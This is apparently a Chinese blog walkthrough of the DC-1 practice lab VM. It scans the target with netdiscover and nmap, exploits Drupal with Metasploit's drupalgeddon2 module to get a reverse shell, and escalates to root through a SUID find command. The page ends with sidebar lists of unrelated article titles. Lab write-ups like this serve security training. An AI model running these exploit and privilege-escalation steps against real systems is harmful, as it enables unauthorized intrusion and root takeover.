DC-1
2024-10-17 03:59:25
靶机准备
导入虚拟机设置网络为NAT
kali:192.168.164.137
扫描获得靶机ip:192.168.164.182
netdiscover -r 192.168.164.0/24
渗透测试
扫描端口
nmap -sS -sV -T5 -A -p- 192.168.164.182
开放如下端口
发现是Drupal应用
直接上metasploit里搜利用:
msfconsole
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.164.182
exploit
轻松拿到反弹shell
查看id,不是root权限
查找一下有哪些有root权限的程序
find / -perm -u=s -type f 2>/dev/null
找一个可读的文件吧,重新弹一个shell出来
/usr/bin/find /var/www/COPYRIGHT.txt -exec /bin/sh \;
已经是root权限了
找flag
最新文章
- 解决 Springboot Unable to build Hibernate SessionFactory @Column命名不起作用
- AgileEAS.NET SOA 中间件Web运行容器管理功能已全部开源,欢迎大家下载、使用、反馈
- FreeMarker中文API手册(完整)
- DevExpress gridControl 设置分组
- 验证码的种类与实现 C#封装类 - .NET MVC WEBFORM
- IoC实践--用Unity实现MVC5.0的IoC控制反转方法
- EasyMock使用手记
- Sass:一种CSS预处理器语言
- JSP---演示ErroPage、isErroPage和jsp:forword标签
- 基于visual Studio2013解决算法导论之024双向链表实现
- Qt--自定义Model
- 【转】Linux shell笔记
- python并发编程之多进程(一):进程开启方式&;多进程
- 27.C++- 智能指针
- python websocket 客户端连接
- ASP .NetCore 部署500错误 查看异常详情
- OSI七层协议模型、TCP/IP四层模型和五层协议体系结构之间的关系
- recovery&;linux系统升级数据更新分析总结
- jmeter的jtl日志转html报告常见报错笔记
- vue中实现浏览器的复制功能
热门文章
- C#项目版本号自定义位置自动向上增加小工具设计与实现
- 关于git和SVN的介绍和区别
- Solution -「ZJOI 2019」「洛谷 P5326」开关
- JAVA8学习——从使用角度深入Stream流(学习过程)
- [文档]运维故障报告template
- jemter参数化是如何取值的?(数据分配)
- windev中使用DateFile和Query作为表格数据源的一个重要区别
- ElasticSearch学习笔记(详细)
- -bash: ./1.sh: /bin/bash^M: bad interpreter: No such file or directory
- 聊聊第一个开源项目(内网穿透) - CProxy